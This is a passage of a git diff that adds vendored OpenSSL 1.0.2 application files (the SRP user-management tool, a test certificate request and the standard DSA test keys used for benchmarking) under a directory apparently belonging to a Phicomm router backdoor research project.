+                BIO_printf(bio_err, "error loading the config file '%s'\n",
+                           configfile);
+            else
+                BIO_printf(bio_err, "error on line %ld of config file '%s'\n",
+                           errorline, configfile);
+            goto err;
+        }
+        if (tofree) {
+            OPENSSL_free(tofree);
+            tofree = NULL;
+        }
+
+        if (!load_config(bio_err, conf))
+            goto err;
+
+        /* Lets get the config section we are using */
+        if (section == NULL) {
+            VERBOSE BIO_printf(bio_err,
+                               "trying to read " ENV_DEFAULT_SRP
+                               " in \" BASE_SECTION \"\n");
+
+            section = NCONF_get_string(conf, BASE_SECTION, ENV_DEFAULT_SRP);
+            if (section == NULL) {
+                lookup_fail(BASE_SECTION, ENV_DEFAULT_SRP);
+                goto err;
+            }
+        }
+
+        if (randfile == NULL && conf)
+            randfile = NCONF_get_string(conf, BASE_SECTION, "RANDFILE");
+
+        VERBOSE BIO_printf(bio_err,
+                           "trying to read " ENV_DATABASE
+                           " in section \"%s\"\n", section);
+
+        if ((dbfile = NCONF_get_string(conf, section, ENV_DATABASE)) == NULL) {
+            lookup_fail(section, ENV_DATABASE);
+            goto err;
+        }
+
+    }
+    if (randfile == NULL)
+        ERR_clear_error();
+    else
+        app_RAND_load_file(randfile, bio_err, 0);
+
+    VERBOSE BIO_printf(bio_err, "Trying to read SRP verifier file \"%s\"\n",
+                       dbfile);
+
+    db = load_index(dbfile, &db_attr);
+    if (db == NULL)
+        goto err;
+
+    /* Lets check some fields */
+    for (i = 0; i < sk_OPENSSL_PSTRING_num(db->db->data); i++) {
+        pp = sk_OPENSSL_PSTRING_value(db->db->data, i);
+
+        if (pp[DB_srptype][0] == DB_SRP_INDEX) {
+            maxgN = i;
+            if (gNindex < 0 && gN != NULL && !strcmp(gN, pp[DB_srpid]))
+                gNindex = i;
+
+            print_index(db, bio_err, i, verbose > 1);
+        }
+    }
+
+    VERBOSE BIO_printf(bio_err, "Database initialised\n");
+
+    if (gNindex >= 0) {
+        gNrow = sk_OPENSSL_PSTRING_value(db->db->data, gNindex);
+        print_entry(db, bio_err, gNindex, verbose > 1, "Default g and N");
+    } else if (maxgN > 0 && !SRP_get_default_gN(gN)) {
+        BIO_printf(bio_err, "No g and N value for index \"%s\"\n", gN);
+        goto err;
+    } else {
+        VERBOSE BIO_printf(bio_err, "Database has no g N information.\n");
+        gNrow = NULL;
+    }
+
+    VVERBOSE BIO_printf(bio_err, "Starting user processing\n");
+
+    if (argc > 0)
+        user = *(argv++);
+
+    while (list_user || user) {
+        int userindex = -1;
+        if (user)
+            VVERBOSE BIO_printf(bio_err, "Processing user \"%s\"\n", user);
+        if ((userindex = get_index(db, user, 'U')) >= 0) {
+            print_user(db, bio_err, userindex, (verbose > 0) || list_user);
+        }
+
+        if (list_user) {
+            if (user == NULL) {
+                BIO_printf(bio_err, "List all users\n");
+
+                for (i = 0; i < sk_OPENSSL_PSTRING_num(db->db->data); i++) {
+                    print_user(db, bio_err, i, 1);
+                }
+                list_user = 0;
+            } else if (userindex < 0) {
+                BIO_printf(bio_err,
+                           "user \"%s\" does not exist, ignored. t\n", user);
+                errors++;
+            }
+        } else if (add_user) {
+            if (userindex >= 0) {
+                /* reactivation of a new user */
+                char **row =
+                    sk_OPENSSL_PSTRING_value(db->db->data, userindex);
+                BIO_printf(bio_err, "user \"%s\" reactivated.\n", user);
+                row[DB_srptype][0] = 'V';
+
+                doupdatedb = 1;
+            } else {
+                char *row[DB_NUMBER];
+                char *gNid;
+                row[DB_srpverifier] = NULL;
+                row[DB_srpsalt] = NULL;
+                row[DB_srpinfo] = NULL;
+                if (!
+                    (gNid =
+                     srp_create_user(user, &(row[DB_srpverifier]),
+                                     &(row[DB_srpsalt]),
+                                     gNrow ? gNrow[DB_srpsalt] : gN,
+                                     gNrow ? gNrow[DB_srpverifier] : NULL,
+                                     passout, bio_err, verbose))) {
+                    BIO_printf(bio_err,
+                               "Cannot create srp verifier for user \"%s\", operation abandoned .\n",
+                               user);
+                    errors++;
+                    goto err;
+                }
+                row[DB_srpid] = BUF_strdup(user);
+                row[DB_srptype] = BUF_strdup("v");
+                row[DB_srpgN] = BUF_strdup(gNid);
+
+                if (!row[DB_srpid] || !row[DB_srpgN] || !row[DB_srptype]
+                    || !row[DB_srpverifier] || !row[DB_srpsalt] || (userinfo
+                                                                    &&
+                                                                    (!(row
+                                                                       [DB_srpinfo]
+                                                                       =
+                                                                       BUF_strdup
+                                                                       (userinfo))))
+                    || !update_index(db, bio_err, row)) {
+                    if (row[DB_srpid])
+                        OPENSSL_free(row[DB_srpid]);
+                    if (row[DB_srpgN])
+                        OPENSSL_free(row[DB_srpgN]);
+                    if (row[DB_srpinfo])
+                        OPENSSL_free(row[DB_srpinfo]);
+                    if (row[DB_srptype])
+                        OPENSSL_free(row[DB_srptype]);
+                    if (row[DB_srpverifier])
+                        OPENSSL_free(row[DB_srpverifier]);
+                    if (row[DB_srpsalt])
+                        OPENSSL_free(row[DB_srpsalt]);
+                    goto err;
+                }
+                doupdatedb = 1;
+            }
+        } else if (modify_user) {
+            if (userindex < 0) {
+                BIO_printf(bio_err,
+                           "user \"%s\" does not exist, operation ignored.\n",
+                           user);
+                errors++;
+            } else {
+
+                char **row =
+                    sk_OPENSSL_PSTRING_value(db->db->data, userindex);
+                char type = row[DB_srptype][0];
+                if (type == 'v') {
+                    BIO_printf(bio_err,
+                               "user \"%s\" already updated, operation ignored.\n",
+                               user);
+                    errors++;
+                } else {
+                    char *gNid;
+
+                    if (row[DB_srptype][0] == 'V') {
+                        int user_gN;
+                        char **irow = NULL;
+                        VERBOSE BIO_printf(bio_err,
+                                           "Verifying password for user \"%s\"\n",
+                                           user);
+                        if ((user_gN =
+                             get_index(db, row[DB_srpgN], DB_SRP_INDEX)) >= 0)
+                            irow =
+                                (char **)sk_OPENSSL_PSTRING_value(db->
+                                                                  db->data,
+                                                                  userindex);
+
+                        if (!srp_verify_user
+                            (user, row[DB_srpverifier], row[DB_srpsalt],
+                             irow ? irow[DB_srpsalt] : row[DB_srpgN],
+                             irow ? irow[DB_srpverifier] : NULL, passin,
+                             bio_err, verbose)) {
+                            BIO_printf(bio_err,
+                                       "Invalid password for user \"%s\", operation abandoned.\n",
+                                       user);
+                            errors++;
+                            goto err;
+                        }
+                    }
+                    VERBOSE BIO_printf(bio_err,
+                                       "Password for user \"%s\" ok.\n",
+                                       user);
+
+                    if (!
+                        (gNid =
+                         srp_create_user(user, &(row[DB_srpverifier]),
+                                         &(row[DB_srpsalt]),
+                                         gNrow ? gNrow[DB_srpsalt] : NULL,
+                                         gNrow ? gNrow[DB_srpverifier] : NULL,
+                                         passout, bio_err, verbose))) {
+                        BIO_printf(bio_err,
+                                   "Cannot create srp verifier for user \"%s\", operation abandoned.\n",
+                                   user);
+                        errors++;
+                        goto err;
+                    }
+
+                    row[DB_srptype][0] = 'v';
+                    row[DB_srpgN] = BUF_strdup(gNid);
+
+                    if (!row[DB_srpid] || !row[DB_srpgN] || !row[DB_srptype]
+                        || !row[DB_srpverifier] || !row[DB_srpsalt]
+                        || (userinfo
+                            && (!(row[DB_srpinfo] = BUF_strdup(userinfo)))))
+                        goto err;
+
+                    doupdatedb = 1;
+                }
+            }
+        } else if (delete_user) {
+            if (userindex < 0) {
+                BIO_printf(bio_err,
+                           "user \"%s\" does not exist, operation ignored. t\n",
+                           user);
+                errors++;
+            } else {
+                char **xpp =
+                    sk_OPENSSL_PSTRING_value(db->db->data, userindex);
+                BIO_printf(bio_err, "user \"%s\" revoked. t\n", user);
+
+                xpp[DB_srptype][0] = 'R';
+
+                doupdatedb = 1;
+            }
+        }
+        if (--argc > 0)
+            user = *(argv++);
+        else {
+            user = NULL;
+            list_user = 0;
+        }
+    }
+
+    VERBOSE BIO_printf(bio_err, "User procession done.\n");
+
+    if (doupdatedb) {
+        /* Lets check some fields */
+        for (i = 0; i < sk_OPENSSL_PSTRING_num(db->db->data); i++) {
+            pp = sk_OPENSSL_PSTRING_value(db->db->data, i);
+
+            if (pp[DB_srptype][0] == 'v') {
+                pp[DB_srptype][0] = 'V';
+                print_user(db, bio_err, i, verbose);
+            }
+        }
+
+        VERBOSE BIO_printf(bio_err, "Trying to update srpvfile.\n");
+        if (!save_index(dbfile, "new", db))
+            goto err;
+
+        VERBOSE BIO_printf(bio_err, "Temporary srpvfile created.\n");
+        if (!rotate_index(dbfile, "new", "old"))
+            goto err;
+
+        VERBOSE BIO_printf(bio_err, "srpvfile updated.\n");
+    }
+
+    ret = (errors != 0);
+ err:
+    if (errors != 0)
+        VERBOSE BIO_printf(bio_err, "User errors %d.\n", errors);
+
+    VERBOSE BIO_printf(bio_err, "SRP terminating with code %d.\n", ret);
+    if (tofree)
+        OPENSSL_free(tofree);
+    if (ret)
+        ERR_print_errors(bio_err);
+    if (randfile)
+        app_RAND_write_file(randfile, bio_err);
+    if (conf)
+        NCONF_free(conf);
+    if (db)
+        free_index(db);
+
+    OBJ_cleanup();
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/srp.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/srp.o
new file mode 100644
index 0000000000000000000000000000000000000000..5029d247883c8ebaeb465cfc78cb21fc4be37be9
GIT binary patch
literal 1072
zcmbVL%}T>S5T11F?@4chmv~aqE~!6=JxHL`UPQbUy(Tdzl>Crvz+UPr_$WR?U#U-^
zGs!M4yQ!c9vorI}e6zE=$@}Q;w&OUU#DN?5i4+R(seyhC`>+jL0OR3s;2urFDixJ`
z&Cj{l>t9uM*q@(y+`Bk#;HFm>%?|1s>iB*F9e@R44D~mm?Ypr2YO7(b6H`y@-Xd(p
zZmgclCNNmHK|~l%WJy`%JObe5ED=G7RuqkWRi2371n}oT1i-_x1RiBc5~qlznTR>w
zO0N__G?np7TJgNd^0*K)YqviG`^ccXG*9HO=%hV+U2%XbVdi`Jb=F=?{vnoZqW+hE
zid^dHq3Ytx;6w+}SNkh_sbPBQR1Y*?@f0*dX9LyzvT|AAN~;W=RTt`Kaw-2Iix$!n
mPboor630Kzx;sie$U$i~UCjA+F=^gC)j!I@C!LJG$^Qn4IX9yK

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/testCA.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/testCA.pem
new file mode 100644
index 0000000..dcb710a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/testCA.pem
@@ -0,0 +1,8 @@
+-----BEGIN CERTIFICATE REQUEST-----
+MIIBBzCBsgIBADBNMQswCQYDVQQGEwJBVTETMBEGA1UECBMKUXVlZW5zbGFuZDEX
+MBUGA1UEChMOTWluY29tIFB0eSBMdGQxEDAOBgNVBAMTB1RFU1QgQ0EwXDANBgkq
+hkiG9w0BAQEFAANLADBIAkEAzW9brgA8efT2ODB+NrsflJZj3KKqKsm4OrXTRqfL
+VETj1ws/zCXl42XJAxdWQMCP0liKfc9Ut4xi1qCVI7N07wIDAQABoAAwDQYJKoZI
+hvcNAQEEBQADQQBjZZ42Det9Uw0AFwJy4ufUEy5Cv74pxBp5SZnljgHY+Az0Hs2S
+uNkIegr2ITX5azKi9nOkg9ZmsmGG13FIjiC/
+-----END CERTIFICATE REQUEST-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/testdsa.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/testdsa.h
new file mode 100644
index 0000000..550c625
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/testdsa.h
@@ -0,0 +1,233 @@
+/* NOCW */
+/* used by apps/speed.c */
+DSA *get_dsa512(void);
+DSA *get_dsa1024(void);
+DSA *get_dsa2048(void);
+static unsigned char dsa512_priv[] = {
+    0x65, 0xe5, 0xc7, 0x38, 0x60, 0x24, 0xb5, 0x89, 0xd4, 0x9c, 0xeb, 0x4c,
+    0x9c, 0x1d, 0x7a, 0x22, 0xbd, 0xd1, 0xc2, 0xd2,
+};
+
+static unsigned char dsa512_pub[] = {
+    0x00, 0x95, 0xa7, 0x0d, 0xec, 0x93, 0x68, 0xba, 0x5f, 0xf7, 0x5f, 0x07,
+    0xf2, 0x3b, 0xad, 0x6b, 0x01, 0xdc, 0xbe, 0xec, 0xde, 0x04, 0x7a, 0x3a,
+    0x27, 0xb3, 0xec, 0x49, 0xfd, 0x08, 0x43, 0x3d, 0x7e, 0xa8, 0x2c, 0x5e,
+    0x7b, 0xbb, 0xfc, 0xf4, 0x6e, 0xeb, 0x6c, 0xb0, 0x6e, 0xf8, 0x02, 0x12,
+    0x8c, 0x38, 0x5d, 0x83, 0x56, 0x7d, 0xee, 0x53, 0x05, 0x3e, 0x24, 0x84,
+    0xbe, 0xba, 0x0a, 0x6b, 0xc8,
+};
+
+static unsigned char dsa512_p[] = {
+    0x9D, 0x1B, 0x69, 0x8E, 0x26, 0xDB, 0xF2, 0x2B, 0x11, 0x70, 0x19, 0x86,
+    0xF6, 0x19, 0xC8, 0xF8, 0x19, 0xF2, 0x18, 0x53, 0x94, 0x46, 0x06, 0xD0,
+    0x62, 0x50, 0x33, 0x4B, 0x02, 0x3C, 0x52, 0x30, 0x03, 0x8B, 0x3B, 0xF9,
+    0x5F, 0xD1, 0x24, 0x06, 0x4F, 0x7B, 0x4C, 0xBA, 0xAA, 0x40, 0x9B, 0xFD,
+    0x96, 0xE4, 0x37, 0x33, 0xBB, 0x2D, 0x5A, 0xD7, 0x5A, 0x11, 0x40, 0x66,
+    0xA2, 0x76, 0x7D, 0x31,
+};
+
+static unsigned char dsa512_q[] = {
+    0xFB, 0x53, 0xEF, 0x50, 0xB4, 0x40, 0x92, 0x31, 0x56, 0x86, 0x53, 0x7A,
+    0xE8, 0x8B, 0x22, 0x9A, 0x49, 0xFB, 0x71, 0x8F,
+};
+
+static unsigned char dsa512_g[] = {
+    0x83, 0x3E, 0x88, 0xE5, 0xC5, 0x89, 0x73, 0xCE, 0x3B, 0x6C, 0x01, 0x49,
+    0xBF, 0xB3, 0xC7, 0x9F, 0x0A, 0xEA, 0x44, 0x91, 0xE5, 0x30, 0xAA, 0xD9,
+    0xBE, 0x5B, 0x5F, 0xB7, 0x10, 0xD7, 0x89, 0xB7, 0x8E, 0x74, 0xFB, 0xCF,
+    0x29, 0x1E, 0xEB, 0xA8, 0x2C, 0x54, 0x51, 0xB8, 0x10, 0xDE, 0xA0, 0xCE,
+    0x2F, 0xCC, 0x24, 0x6B, 0x90, 0x77, 0xDE, 0xA2, 0x68, 0xA6, 0x52, 0x12,
+    0xA2, 0x03, 0x9D, 0x20,
+};
+
+DSA *get_dsa512()
+{
+    DSA *dsa;
+
+    if ((dsa = DSA_new()) == NULL)
+        return (NULL);
+    dsa->priv_key = BN_bin2bn(dsa512_priv, sizeof(dsa512_priv), NULL);
+    dsa->pub_key = BN_bin2bn(dsa512_pub, sizeof(dsa512_pub), NULL);
+    dsa->p = BN_bin2bn(dsa512_p, sizeof(dsa512_p), NULL);
+    dsa->q = BN_bin2bn(dsa512_q, sizeof(dsa512_q), NULL);
+    dsa->g = BN_bin2bn(dsa512_g, sizeof(dsa512_g), NULL);
+    if ((dsa->priv_key == NULL) || (dsa->pub_key == NULL) || (dsa->p == NULL)
+        || (dsa->q == NULL) || (dsa->g == NULL))
+        return (NULL);
+    return (dsa);
+}
+
+static unsigned char dsa1024_priv[] = {
+    0x7d, 0x21, 0xda, 0xbb, 0x62, 0x15, 0x47, 0x36, 0x07, 0x67, 0x12, 0xe8,
+    0x8c, 0xaa, 0x1c, 0xcd, 0x38, 0x12, 0x61, 0x18,
+};
+
+static unsigned char dsa1024_pub[] = {
+    0x3c, 0x4e, 0x9c, 0x2a, 0x7f, 0x16, 0xc1, 0x25, 0xeb, 0xac, 0x78, 0x63,
+    0x90, 0x14, 0x8c, 0x8b, 0xf4, 0x68, 0x43, 0x3c, 0x2d, 0xee, 0x65, 0x50,
+    0x7d, 0x9c, 0x8f, 0x8c, 0x8a, 0x51, 0xd6, 0x11, 0x2b, 0x99, 0xaf, 0x1e,
+    0x90, 0x97, 0xb5, 0xd3, 0xa6, 0x20, 0x25, 0xd6, 0xfe, 0x43, 0x02, 0xd5,
+    0x91, 0x7d, 0xa7, 0x8c, 0xdb, 0xc9, 0x85, 0xa3, 0x36, 0x48, 0xf7, 0x68,
+    0xaa, 0x60, 0xb1, 0xf7, 0x05, 0x68, 0x3a, 0xa3, 0x3f, 0xd3, 0x19, 0x82,
+    0xd8, 0x82, 0x7a, 0x77, 0xfb, 0xef, 0xf4, 0x15, 0x0a, 0xeb, 0x06, 0x04,
+    0x7f, 0x53, 0x07, 0x0c, 0xbc, 0xcb, 0x2d, 0x83, 0xdb, 0x3e, 0xd1, 0x28,
+    0xa5, 0xa1, 0x31, 0xe0, 0x67, 0xfa, 0x50, 0xde, 0x9b, 0x07, 0x83, 0x7e,
+    0x2c, 0x0b, 0xc3, 0x13, 0x50, 0x61, 0xe5, 0xad, 0xbd, 0x36, 0xb8, 0x97,
+    0x4e, 0x40, 0x7d, 0xe8, 0x83, 0x0d, 0xbc, 0x4b
+};
+
+static unsigned char dsa1024_p[] = {
+    0xA7, 0x3F, 0x6E, 0x85, 0xBF, 0x41, 0x6A, 0x29, 0x7D, 0xF0, 0x9F, 0x47,
+    0x19, 0x30, 0x90, 0x9A, 0x09, 0x1D, 0xDA, 0x6A, 0x33, 0x1E, 0xC5, 0x3D,
+    0x86, 0x96, 0xB3, 0x15, 0xE0, 0x53, 0x2E, 0x8F, 0xE0, 0x59, 0x82, 0x73,
+    0x90, 0x3E, 0x75, 0x31, 0x99, 0x47, 0x7A, 0x52, 0xFB, 0x85, 0xE4, 0xD9,
+    0xA6, 0x7B, 0x38, 0x9B, 0x68, 0x8A, 0x84, 0x9B, 0x87, 0xC6, 0x1E, 0xB5,
+    0x7E, 0x86, 0x4B, 0x53, 0x5B, 0x59, 0xCF, 0x71, 0x65, 0x19, 0x88, 0x6E,
+    0xCE, 0x66, 0xAE, 0x6B, 0x88, 0x36, 0xFB, 0xEC, 0x28, 0xDC, 0xC2, 0xD7,
+    0xA5, 0xBB, 0xE5, 0x2C, 0x39, 0x26, 0x4B, 0xDA, 0x9A, 0x70, 0x18, 0x95,
+    0x37, 0x95, 0x10, 0x56, 0x23, 0xF6, 0x15, 0xED, 0xBA, 0x04, 0x5E, 0xDE,
+    0x39, 0x4F, 0xFD, 0xB7, 0x43, 0x1F, 0xB5, 0xA4, 0x65, 0x6F, 0xCD, 0x80,
+    0x11, 0xE4, 0x70, 0x95, 0x5B, 0x50, 0xCD, 0x49,
+};
+
+static unsigned char dsa1024_q[] = {
+    0xF7, 0x07, 0x31, 0xED, 0xFA, 0x6C, 0x06, 0x03, 0xD5, 0x85, 0x8A, 0x1C,
+    0xAC, 0x9C, 0x65, 0xE7, 0x50, 0x66, 0x65, 0x6F,
+};
+
+static unsigned char dsa1024_g[] = {
+    0x4D, 0xDF, 0x4C, 0x03, 0xA6, 0x91, 0x8A, 0xF5, 0x19, 0x6F, 0x50, 0x46,
+    0x25, 0x99, 0xE5, 0x68, 0x6F, 0x30, 0xE3, 0x69, 0xE1, 0xE5, 0xB3, 0x5D,
+    0x98, 0xBB, 0x28, 0x86, 0x48, 0xFC, 0xDE, 0x99, 0x04, 0x3F, 0x5F, 0x88,
+    0x0C, 0x9C, 0x73, 0x24, 0x0D, 0x20, 0x5D, 0xB9, 0x2A, 0x9A, 0x3F, 0x18,
+    0x96, 0x27, 0xE4, 0x62, 0x87, 0xC1, 0x7B, 0x74, 0x62, 0x53, 0xFC, 0x61,
+    0x27, 0xA8, 0x7A, 0x91, 0x09, 0x9D, 0xB6, 0xF1, 0x4D, 0x9C, 0x54, 0x0F,
+    0x58, 0x06, 0xEE, 0x49, 0x74, 0x07, 0xCE, 0x55, 0x7E, 0x23, 0xCE, 0x16,
+    0xF6, 0xCA, 0xDC, 0x5A, 0x61, 0x01, 0x7E, 0xC9, 0x71, 0xB5, 0x4D, 0xF6,
+    0xDC, 0x34, 0x29, 0x87, 0x68, 0xF6, 0x5E, 0x20, 0x93, 0xB3, 0xDB, 0xF5,
+    0xE4, 0x09, 0x6C, 0x41, 0x17, 0x95, 0x92, 0xEB, 0x01, 0xB5, 0x73, 0xA5,
+    0x6A, 0x7E, 0xD8, 0x32, 0xED, 0x0E, 0x02, 0xB8,
+};
+
+DSA *get_dsa1024()
+{
+    DSA *dsa;
+
+    if ((dsa = DSA_new()) == NULL)
+        return (NULL);
+    dsa->priv_key = BN_bin2bn(dsa1024_priv, sizeof(dsa1024_priv), NULL);
+    dsa->pub_key = BN_bin2bn(dsa1024_pub, sizeof(dsa1024_pub), NULL);
+    dsa->p = BN_bin2bn(dsa1024_p, sizeof(dsa1024_p), NULL);
+    dsa->q = BN_bin2bn(dsa1024_q, sizeof(dsa1024_q), NULL);
+    dsa->g = BN_bin2bn(dsa1024_g, sizeof(dsa1024_g), NULL);
+    if ((dsa->priv_key == NULL) || (dsa->pub_key == NULL) || (dsa->p == NULL)
+        || (dsa->q == NULL) || (dsa->g == NULL))
+        return (NULL);
+    return (dsa);
+}
+
+static unsigned char dsa2048_priv[] = {
+    0x32, 0x67, 0x92, 0xf6, 0xc4, 0xe2, 0xe2, 0xe8, 0xa0, 0x8b, 0x6b, 0x45,
+    0x0c, 0x8a, 0x76, 0xb0, 0xee, 0xcf, 0x91, 0xa7,
+};
+
+static unsigned char dsa2048_pub[] = {
+    0x17, 0x8f, 0xa8, 0x11, 0x84, 0x92, 0xec, 0x83, 0x47, 0xc7, 0x6a, 0xb0,
+    0x92, 0xaf, 0x5a, 0x20, 0x37, 0xa3, 0x64, 0x79, 0xd2, 0xd0, 0x3d, 0xcd,
+    0xe0, 0x61, 0x88, 0x88, 0x21, 0xcc, 0x74, 0x5d, 0xce, 0x4c, 0x51, 0x47,
+    0xf0, 0xc5, 0x5c, 0x4c, 0x82, 0x7a, 0xaf, 0x72, 0xad, 0xb9, 0xe0, 0x53,
+    0xf2, 0x78, 0xb7, 0xf0, 0xb5, 0x48, 0x7f, 0x8a, 0x3a, 0x18, 0xd1, 0x9f,
+    0x8b, 0x7d, 0xa5, 0x47, 0xb7, 0x95, 0xab, 0x98, 0xf8, 0x7b, 0x74, 0x50,
+    0x56, 0x8e, 0x57, 0xf0, 0xee, 0xf5, 0xb7, 0xba, 0xab, 0x85, 0x86, 0xf9,
+    0x2b, 0xef, 0x41, 0x56, 0xa0, 0xa4, 0x9f, 0xb7, 0x38, 0x00, 0x46, 0x0a,
+    0xa6, 0xf1, 0xfc, 0x1f, 0xd8, 0x4e, 0x85, 0x44, 0x92, 0x43, 0x21, 0x5d,
+    0x6e, 0xcc, 0xc2, 0xcb, 0x26, 0x31, 0x0d, 0x21, 0xc4, 0xbd, 0x8d, 0x24,
+    0xbc, 0xd9, 0x18, 0x19, 0xd7, 0xdc, 0xf1, 0xe7, 0x93, 0x50, 0x48, 0x03,
+    0x2c, 0xae, 0x2e, 0xe7, 0x49, 0x88, 0x5f, 0x93, 0x57, 0x27, 0x99, 0x36,
+    0xb4, 0x20, 0xab, 0xfc, 0xa7, 0x2b, 0xf2, 0xd9, 0x98, 0xd7, 0xd4, 0x34,
+    0x9d, 0x96, 0x50, 0x58, 0x9a, 0xea, 0x54, 0xf3, 0xee, 0xf5, 0x63, 0x14,
+    0xee, 0x85, 0x83, 0x74, 0x76, 0xe1, 0x52, 0x95, 0xc3, 0xf7, 0xeb, 0x04,
+    0x04, 0x7b, 0xa7, 0x28, 0x1b, 0xcc, 0xea, 0x4a, 0x4e, 0x84, 0xda, 0xd8,
+    0x9c, 0x79, 0xd8, 0x9b, 0x66, 0x89, 0x2f, 0xcf, 0xac, 0xd7, 0x79, 0xf9,
+    0xa9, 0xd8, 0x45, 0x13, 0x78, 0xb9, 0x00, 0x14, 0xc9, 0x7e, 0x22, 0x51,
+    0x86, 0x67, 0xb0, 0x9f, 0x26, 0x11, 0x23, 0xc8, 0x38, 0xd7, 0x70, 0x1d,
+    0x15, 0x8e, 0x4d, 0x4f, 0x95, 0x97, 0x40, 0xa1, 0xc2, 0x7e, 0x01, 0x18,
+    0x72, 0xf4, 0x10, 0xe6, 0x8d, 0x52, 0x16, 0x7f, 0xf2, 0xc9, 0xf8, 0x33,
+    0x8b, 0x33, 0xb7, 0xce,
+};
+
+static unsigned char dsa2048_p[] = {
+    0xA0, 0x25, 0xFA, 0xAD, 0xF4, 0x8E, 0xB9, 0xE5, 0x99, 0xF3, 0x5D, 0x6F,
+    0x4F, 0x83, 0x34, 0xE2, 0x7E, 0xCF, 0x6F, 0xBF, 0x30, 0xAF, 0x6F, 0x81,
+    0xEB, 0xF8, 0xC4, 0x13, 0xD9, 0xA0, 0x5D, 0x8B, 0x5C, 0x8E, 0xDC, 0xC2,
+    0x1D, 0x0B, 0x41, 0x32, 0xB0, 0x1F, 0xFE, 0xEF, 0x0C, 0xC2, 0xA2, 0x7E,
+    0x68, 0x5C, 0x28, 0x21, 0xE9, 0xF5, 0xB1, 0x58, 0x12, 0x63, 0x4C, 0x19,
+    0x4E, 0xFF, 0x02, 0x4B, 0x92, 0xED, 0xD2, 0x07, 0x11, 0x4D, 0x8C, 0x58,
+    0x16, 0x5C, 0x55, 0x8E, 0xAD, 0xA3, 0x67, 0x7D, 0xB9, 0x86, 0x6E, 0x0B,
+    0xE6, 0x54, 0x6F, 0x40, 0xAE, 0x0E, 0x67, 0x4C, 0xF9, 0x12, 0x5B, 0x3C,
+    0x08, 0x7A, 0xF7, 0xFC, 0x67, 0x86, 0x69, 0xE7, 0x0A, 0x94, 0x40, 0xBF,
+    0x8B, 0x76, 0xFE, 0x26, 0xD1, 0xF2, 0xA1, 0x1A, 0x84, 0xA1, 0x43, 0x56,
+    0x28, 0xBC, 0x9A, 0x5F, 0xD7, 0x3B, 0x69, 0x89, 0x8A, 0x36, 0x2C, 0x51,
+    0xDF, 0x12, 0x77, 0x2F, 0x57, 0x7B, 0xA0, 0xAA, 0xDD, 0x7F, 0xA1, 0x62,
+    0x3B, 0x40, 0x7B, 0x68, 0x1A, 0x8F, 0x0D, 0x38, 0xBB, 0x21, 0x5D, 0x18,
+    0xFC, 0x0F, 0x46, 0xF7, 0xA3, 0xB0, 0x1D, 0x23, 0xC3, 0xD2, 0xC7, 0x72,
+    0x51, 0x18, 0xDF, 0x46, 0x95, 0x79, 0xD9, 0xBD, 0xB5, 0x19, 0x02, 0x2C,
+    0x87, 0xDC, 0xE7, 0x57, 0x82, 0x7E, 0xF1, 0x8B, 0x06, 0x3D, 0x00, 0xA5,
+    0x7B, 0x6B, 0x26, 0x27, 0x91, 0x0F, 0x6A, 0x77, 0xE4, 0xD5, 0x04, 0xE4,
+    0x12, 0x2C, 0x42, 0xFF, 0xD2, 0x88, 0xBB, 0xD3, 0x92, 0xA0, 0xF9, 0xC8,
+    0x51, 0x64, 0x14, 0x5C, 0xD8, 0xF9, 0x6C, 0x47, 0x82, 0xB4, 0x1C, 0x7F,
+    0x09, 0xB8, 0xF0, 0x25, 0x83, 0x1D, 0x3F, 0x3F, 0x05, 0xB3, 0x21, 0x0A,
+    0x5D, 0xA7, 0xD8, 0x54, 0xC3, 0x65, 0x7D, 0xC3, 0xB0, 0x1D, 0xBF, 0xAE,
+    0xF8, 0x68, 0xCF, 0x9B,
+};
+
+static unsigned char dsa2048_q[] = {
+    0x97, 0xE7, 0x33, 0x4D, 0xD3, 0x94, 0x3E, 0x0B, 0xDB, 0x62, 0x74, 0xC6,
+    0xA1, 0x08, 0xDD, 0x19, 0xA3, 0x75, 0x17, 0x1B,
+};
+
+static unsigned char dsa2048_g[] = {
+    0x2C, 0x78, 0x16, 0x59, 0x34, 0x63, 0xF4, 0xF3, 0x92, 0xFC, 0xB5, 0xA5,
+    0x4F, 0x13, 0xDE, 0x2F, 0x1C, 0xA4, 0x3C, 0xAE, 0xAD, 0x38, 0x3F, 0x7E,
+    0x90, 0xBF, 0x96, 0xA6, 0xAE, 0x25, 0x90, 0x72, 0xF5, 0x8E, 0x80, 0x0C,
+    0x39, 0x1C, 0xD9, 0xEC, 0xBA, 0x90, 0x5B, 0x3A, 0xE8, 0x58, 0x6C, 0x9E,
+    0x30, 0x42, 0x37, 0x02, 0x31, 0x82, 0xBC, 0x6A, 0xDF, 0x6A, 0x09, 0x29,
+    0xE3, 0xC0, 0x46, 0xD1, 0xCB, 0x85, 0xEC, 0x0C, 0x30, 0x5E, 0xEA, 0xC8,
+    0x39, 0x8E, 0x22, 0x9F, 0x22, 0x10, 0xD2, 0x34, 0x61, 0x68, 0x37, 0x3D,
+    0x2E, 0x4A, 0x5B, 0x9A, 0xF5, 0xC1, 0x48, 0xC6, 0xF6, 0xDC, 0x63, 0x1A,
+    0xD3, 0x96, 0x64, 0xBA, 0x34, 0xC9, 0xD1, 0xA0, 0xD1, 0xAE, 0x6C, 0x2F,
+    0x48, 0x17, 0x93, 0x14, 0x43, 0xED, 0xF0, 0x21, 0x30, 0x19, 0xC3, 0x1B,
+    0x5F, 0xDE, 0xA3, 0xF0, 0x70, 0x78, 0x18, 0xE1, 0xA8, 0xE4, 0xEE, 0x2E,
+    0x00, 0xA5, 0xE4, 0xB3, 0x17, 0xC8, 0x0C, 0x7D, 0x6E, 0x42, 0xDC, 0xB7,
+    0x46, 0x00, 0x36, 0x4D, 0xD4, 0x46, 0xAA, 0x3D, 0x3C, 0x46, 0x89, 0x40,
